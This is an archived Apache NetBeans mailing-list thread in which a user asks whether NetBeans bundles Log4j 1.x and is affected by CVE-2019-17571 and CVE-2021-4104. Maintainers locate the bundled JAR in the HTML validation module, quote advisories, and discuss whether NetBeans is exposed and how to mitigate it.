You are viewing a plain text version of this content. The canonical link for it is here.
Posted to users@netbeans.apache.org by As...@wellsfargo.com.INVALID on 2022/01/03 21:32:46 UTC
Log4j 1.x Vulnerabilities
Can the following questions be confirmed for NetBeans?
1. Which versions of your products utilize Log4j 1.x, if any?
1. Do they utilize the JMSAppender or SocketServer classes?
1. Do you have any mitigation options available for addressing both CVE-2019-17571 and CVE-2021-4104?
https://nvd.nist.gov/vuln/detail/CVE-2019-17571
https://nvd.nist.gov/vuln/detail/CVE-2021-4104
* Would it impact the product if we deleted both the net/JMSAppender.class and net/SocketServer.class from the Log4j 1.x JAR itself?
1. Can you provide a roadmap of when you plan to move Log4j version 2.15 or higher?
Thanks,
Ashley Dingman
Re: Log4j 1.x Vulnerabilities
Posted by Geertjan Wielenga <ge...@googlemail.com.INVALID>.
From that, one way to mitigate the issue would be to uninstall the HTML
editor.
Gj
On Tue, Jan 4, 2022 at 4:31 PM Geertjan Wielenga <
geertjan.wielenga@googlemail.com> wrote:
> Here are the relevant places in the sources:
>
>
> https://github.com/apache/netbeans/blob/master/ide/html.validation/external/binaries-list
>
>
> https://github.com/apache/netbeans/blob/master/ide/html.validation/external/log4j-1.2.15-license.txt
>
> I don't see anywhere else, i.e., it's used in the HTML editor for
> validation, looks like.
>
> Gj
>
> On Tue, Jan 4, 2022 at 4:24 PM Geertjan Wielenga <
> geertjan.wielenga@googlemail.com> wrote:
>
>> Indeed, that's a different vulnerability and, indeed, we do need to
>> upgrade to the latest release of log4j.
>>
>> Gj
>>
>> On Tue, Jan 4, 2022 at 4:21 PM Humphrey Clerx <hc...@gmail.com> wrote:
>>
>>> Hi,
>>>
>>> The log4j2 security page also clearly states:
>>>
>>> "Please note that Log4j 1.x has reached End of Life in 2015 and is no
>>> longer supported. Vulnerabilities reported after August 2015 against Log4j
>>> 1.x were not checked and will not be fixed. Users should upgrade to Log4j 2
>>> to obtain security fixes."
>>>
>>> And there is a security vulnerability present in log4j 1.x,
>>> CVE-2019-17571 <https://www.cvedetails.com/cve/CVE-2019-17571/> that
>>> might need addressing in NetBeans. This is stated on the following page:
>>>
>>> - https://logging.apache.org/log4j/1.2/
>>>
>>> Greets,
>>> Humphrey.
>>>
>>> On Tue, Jan 4, 2022 at 2:21 PM Geertjan Wielenga
>>> <ge...@googlemail.com.invalid> wrote:
>>>
>>>> We've looked for "log4j" in the NetBeans 12.6 binaries, as follows:
>>>>
>>>> --
>>>> nb16$ find . -type f | grep -i log4j
>>>> ./extide/ant/lib/ant-apache-log4j.jar
>>>> ./ide/modules/ext/log4j-1.2.15.jar
>>>> --
>>>>
>>>> So, we ship "log41-1.2.15.jar" with the binaries and, quoting the official
>>>> source [1]:
>>>>
>>>> "Log4j 1.x is not impacted by this vulnerability."
>>>>
>>>> (where "this vulnerability" means
>>>> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832).
>>>>
>>>> Hope it helps,
>>>>
>>>> Gj
>>>>
>>>> [1]
>>>> https://logging.apache.org/log4j/2.x/security.html
>>>>
>>>> On Mon, Jan 3, 2022 at 10:33 PM <As...@wellsfargo.com.invalid>
>>>> wrote:
>>>>
>>>>> Can the following questions be confirmed for NetBeans?
>>>>>
>>>>>
>>>>>
>>>>> 1. Which versions of your products utilize Log4j 1.x, if any?
>>>>>
>>>>>
>>>>>
>>>>> 1. Do they utilize the JMSAppender or SocketServer classes?
>>>>>
>>>>>
>>>>>
>>>>> 1. Do you have any mitigation options available for addressing
>>>>> both CVE-2019-17571 and CVE-2021-4104?
>>>>>
>>>>> https://nvd.nist.gov/vuln/detail/CVE-2019-17571
>>>>>
>>>>> https://nvd.nist.gov/vuln/detail/CVE-2021-4104
>>>>>
>>>>>
>>>>>
>>>>> 1. Would it impact the product if we deleted both the
>>>>> net/JMSAppender.class and net/SocketServer.class from the Log4j 1.x JAR
>>>>> itself?
>>>>>
>>>>>
>>>>>
>>>>> 1. Can you provide a roadmap of when you plan to move Log4j
>>>>> version 2.15 or higher?
>>>>>
>>>>>
>>>>>
>>>>> Thanks,
>>>>>
>>>>> Ashley Dingman
>>>>>
>>>>>
>>>>>
>>>>
>>>
>>> --
>>> In the mountains of truth, you never climb in vain - Nietzsche
>>> #-------------------------------------------------------------
>>> \_O
>>> ,__/>
>>> <"
>>> '
>>>
>>
Re: Log4j 1.x Vulnerabilities
Posted by Geertjan Wielenga <ge...@googlemail.com.INVALID>.
Here are the relevant places in the sources:
https://github.com/apache/netbeans/blob/master/ide/html.validation/external/binaries-list
https://github.com/apache/netbeans/blob/master/ide/html.validation/external/log4j-1.2.15-license.txt
I don't see anywhere else, i.e., it's used in the HTML editor for
validation, looks like.
Gj
On Tue, Jan 4, 2022 at 4:24 PM Geertjan Wielenga <
geertjan.wielenga@googlemail.com> wrote:
> Indeed, that's a different vulnerability and, indeed, we do need to
> upgrade to the latest release of log4j.
>
> Gj
>
> On Tue, Jan 4, 2022 at 4:21 PM Humphrey Clerx <hc...@gmail.com> wrote:
>
>> Hi,
>>
>> The log4j2 security page also clearly states:
>>
>> "Please note that Log4j 1.x has reached End of Life in 2015 and is no
>> longer supported. Vulnerabilities reported after August 2015 against Log4j
>> 1.x were not checked and will not be fixed. Users should upgrade to Log4j 2
>> to obtain security fixes."
>>
>> And there is a security vulnerability present in log4j 1.x,
>> CVE-2019-17571 <https://www.cvedetails.com/cve/CVE-2019-17571/> that
>> might need addressing in NetBeans. This is stated on the following page:
>>
>> - https://logging.apache.org/log4j/1.2/
>>
>> Greets,
>> Humphrey.
>>
>> On Tue, Jan 4, 2022 at 2:21 PM Geertjan Wielenga
>> <ge...@googlemail.com.invalid> wrote:
>>
>>> We've looked for "log4j" in the NetBeans 12.6 binaries, as follows:
>>>
>>> --
>>> nb16$ find . -type f | grep -i log4j
>>> ./extide/ant/lib/ant-apache-log4j.jar
>>> ./ide/modules/ext/log4j-1.2.15.jar
>>> --
>>>
>>> So, we ship "log41-1.2.15.jar" with the binaries and, quoting the official
>>> source [1]:
>>>
>>> "Log4j 1.x is not impacted by this vulnerability."
>>>
>>> (where "this vulnerability" means
>>> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832).
>>>
>>> Hope it helps,
>>>
>>> Gj
>>>
>>> [1]
>>> https://logging.apache.org/log4j/2.x/security.html
>>>
>>> On Mon, Jan 3, 2022 at 10:33 PM <As...@wellsfargo.com.invalid>
>>> wrote:
>>>
>>>> Can the following questions be confirmed for NetBeans?
>>>>
>>>>
>>>>
>>>> 1. Which versions of your products utilize Log4j 1.x, if any?
>>>>
>>>>
>>>>
>>>> 1. Do they utilize the JMSAppender or SocketServer classes?
>>>>
>>>>
>>>>
>>>> 1. Do you have any mitigation options available for addressing both
>>>> CVE-2019-17571 and CVE-2021-4104?
>>>>
>>>> https://nvd.nist.gov/vuln/detail/CVE-2019-17571
>>>>
>>>> https://nvd.nist.gov/vuln/detail/CVE-2021-4104
>>>>
>>>>
>>>>
>>>> 1. Would it impact the product if we deleted both the
>>>> net/JMSAppender.class and net/SocketServer.class from the Log4j 1.x JAR
>>>> itself?
>>>>
>>>>
>>>>
>>>> 1. Can you provide a roadmap of when you plan to move Log4j version
>>>> 2.15 or higher?
>>>>
>>>>
>>>>
>>>> Thanks,
>>>>
>>>> Ashley Dingman
>>>>
>>>>
>>>>
>>>
>>
>> --
>> In the mountains of truth, you never climb in vain - Nietzsche
>> #-------------------------------------------------------------
>> \_O
>> ,__/>
>> <"
>> '
>>
>
Re: Log4j 1.x Vulnerabilities
Posted by Geertjan Wielenga <ge...@googlemail.com.INVALID>.
Indeed, that's a different vulnerability and, indeed, we do need to upgrade
to the latest release of log4j.
Gj
On Tue, Jan 4, 2022 at 4:21 PM Humphrey Clerx <hc...@gmail.com> wrote:
> Hi,
>
> The log4j2 security page also clearly states:
>
> "Please note that Log4j 1.x has reached End of Life in 2015 and is no
> longer supported. Vulnerabilities reported after August 2015 against Log4j
> 1.x were not checked and will not be fixed. Users should upgrade to Log4j 2
> to obtain security fixes."
>
> And there is a security vulnerability present in log4j 1.x, CVE-2019-17571
> <https://www.cvedetails.com/cve/CVE-2019-17571/> that might need
> addressing in NetBeans. This is stated on the following page:
>
> - https://logging.apache.org/log4j/1.2/
>
> Greets,
> Humphrey.
>
> On Tue, Jan 4, 2022 at 2:21 PM Geertjan Wielenga
> <ge...@googlemail.com.invalid> wrote:
>
>> We've looked for "log4j" in the NetBeans 12.6 binaries, as follows:
>>
>> --
>> nb16$ find . -type f | grep -i log4j
>> ./extide/ant/lib/ant-apache-log4j.jar
>> ./ide/modules/ext/log4j-1.2.15.jar
>> --
>>
>> So, we ship "log41-1.2.15.jar" with the binaries and, quoting the official
>> source [1]:
>>
>> "Log4j 1.x is not impacted by this vulnerability."
>>
>> (where "this vulnerability" means
>> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832).
>>
>> Hope it helps,
>>
>> Gj
>>
>> [1]
>> https://logging.apache.org/log4j/2.x/security.html
>>
>> On Mon, Jan 3, 2022 at 10:33 PM <As...@wellsfargo.com.invalid>
>> wrote:
>>
>>> Can the following questions be confirmed for NetBeans?
>>>
>>>
>>>
>>> 1. Which versions of your products utilize Log4j 1.x, if any?
>>>
>>>
>>>
>>> 1. Do they utilize the JMSAppender or SocketServer classes?
>>>
>>>
>>>
>>> 1. Do you have any mitigation options available for addressing both
>>> CVE-2019-17571 and CVE-2021-4104?
>>>
>>> https://nvd.nist.gov/vuln/detail/CVE-2019-17571
>>>
>>> https://nvd.nist.gov/vuln/detail/CVE-2021-4104
>>>
>>>
>>>
>>> 1. Would it impact the product if we deleted both the
>>> net/JMSAppender.class and net/SocketServer.class from the Log4j 1.x JAR
>>> itself?
>>>
>>>
>>>
>>> 1. Can you provide a roadmap of when you plan to move Log4j version
>>> 2.15 or higher?
>>>
>>>
>>>
>>> Thanks,
>>>
>>> Ashley Dingman
>>>
>>>
>>>
>>
>
> --
> In the mountains of truth, you never climb in vain - Nietzsche
> #-------------------------------------------------------------
> \_O
> ,__/>
> <"
> '
>
Re: Log4j 1.x Vulnerabilities
Posted by antonio <an...@vieiro.net>.
Hi all,
Quoting from the CVE details:
"to remotely execute arbitrary code when combined with a deserialization
gadget when listening to untrusted network traffic for log data"
Apache NetBeans does not "listen to untrusted network traffic for log
data", so it's not vulnerable.
Kind regards,
Antonio
El 4/1/22 a las 16:24, Humphrey Clerx escribió:
> And there is a security vulnerability present in log4j 1.x,
> CVE-2019-17571 <https://www.cvedetails.com/cve/CVE-2019-17571/> that
> might need addressing in NetBeans. This is stated on the following page:
>
> - https://logging.apache.org/log4j/1.2/
> <https://logging.apache.org/log4j/1.2/>
>
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@netbeans.apache.org
For additional commands, e-mail: users-help@netbeans.apache.org
For further information about the NetBeans mailing lists, visit:
https://cwiki.apache.org/confluence/display/NETBEANS/Mailing+lists
Re: Log4j 1.x Vulnerabilities
Posted by Humphrey Clerx <hc...@gmail.com>.
Hi,
The log4j2 security page also clearly states:
"Please note that Log4j 1.x has reached End of Life in 2015 and is no
longer supported. Vulnerabilities reported after August 2015 against Log4j
1.x were not checked and will not be fixed. Users should upgrade to Log4j 2
to obtain security fixes."
And there is a security vulnerability present in log4j 1.x, CVE-2019-17571
<https://www.cvedetails.com/cve/CVE-2019-17571/> that might need addressing
in NetBeans. This is stated on the following page:
- https://logging.apache.org/log4j/1.2/
Greets,
Humphrey.
On Tue, Jan 4, 2022 at 2:21 PM Geertjan Wielenga
<ge...@googlemail.com.invalid> wrote:
> We've looked for "log4j" in the NetBeans 12.6 binaries, as follows:
>
> --
> nb16$ find . -type f | grep -i log4j
> ./extide/ant/lib/ant-apache-log4j.jar
> ./ide/modules/ext/log4j-1.2.15.jar
> --
>
> So, we ship "log41-1.2.15.jar" with the binaries and, quoting the official
> source [1]:
>
> "Log4j 1.x is not impacted by this vulnerability."
>
> (where "this vulnerability" means
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832).
>
> Hope it helps,
>
> Gj
>
> [1]
> https://logging.apache.org/log4j/2.x/security.html
>
> On Mon, Jan 3, 2022 at 10:33 PM <As...@wellsfargo.com.invalid>
> wrote:
>
>> Can the following questions be confirmed for NetBeans?
>>
>>
>>
>> 1. Which versions of your products utilize Log4j 1.x, if any?
>>
>>
>>
>> 1. Do they utilize the JMSAppender or SocketServer classes?
>>
>>
>>
>> 1. Do you have any mitigation options available for addressing both
>> CVE-2019-17571 and CVE-2021-4104?
>>
>> https://nvd.nist.gov/vuln/detail/CVE-2019-17571
>>
>> https://nvd.nist.gov/vuln/detail/CVE-2021-4104
>>
>>
>>
>> 1. Would it impact the product if we deleted both the
>> net/JMSAppender.class and net/SocketServer.class from the Log4j 1.x JAR
>> itself?
>>
>>
>>
>> 1. Can you provide a roadmap of when you plan to move Log4j version
>> 2.15 or higher?
>>
>>
>>
>> Thanks,
>>
>> Ashley Dingman
>>
>>
>>
>
--
In the mountains of truth, you never climb in vain - Nietzsche
#-------------------------------------------------------------
\_O
,__/>
<"
'
Re: Log4j 1.x Vulnerabilities
Posted by Geertjan Wielenga <ge...@googlemail.com.INVALID>.
We've looked for "log4j" in the NetBeans 12.6 binaries, as follows:
--
nb16$ find . -type f | grep -i log4j
./extide/ant/lib/ant-apache-log4j.jar
./ide/modules/ext/log4j-1.2.15.jar
--
So, we ship "log41-1.2.15.jar" with the binaries and, quoting the official
source [1]:
"Log4j 1.x is not impacted by this vulnerability."
(where "this vulnerability" means
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832).
Hope it helps,
Gj
[1]
https://logging.apache.org/log4j/2.x/security.html
On Mon, Jan 3, 2022 at 10:33 PM <As...@wellsfargo.com.invalid>
wrote:
> Can the following questions be confirmed for NetBeans?
>
>
>
> 1. Which versions of your products utilize Log4j 1.x, if any?
>
>
>
> 1. Do they utilize the JMSAppender or SocketServer classes?
>
>
>
> 1. Do you have any mitigation options available for addressing both
> CVE-2019-17571 and CVE-2021-4104?
>
> https://nvd.nist.gov/vuln/detail/CVE-2019-17571
>
> https://nvd.nist.gov/vuln/detail/CVE-2021-4104
>
>
>
> 1. Would it impact the product if we deleted both the
> net/JMSAppender.class and net/SocketServer.class from the Log4j 1.x JAR
> itself?
>
>
>
> 1. Can you provide a roadmap of when you plan to move Log4j version
> 2.15 or higher?
>
>
>
> Thanks,
>
> Ashley Dingman
>
>
>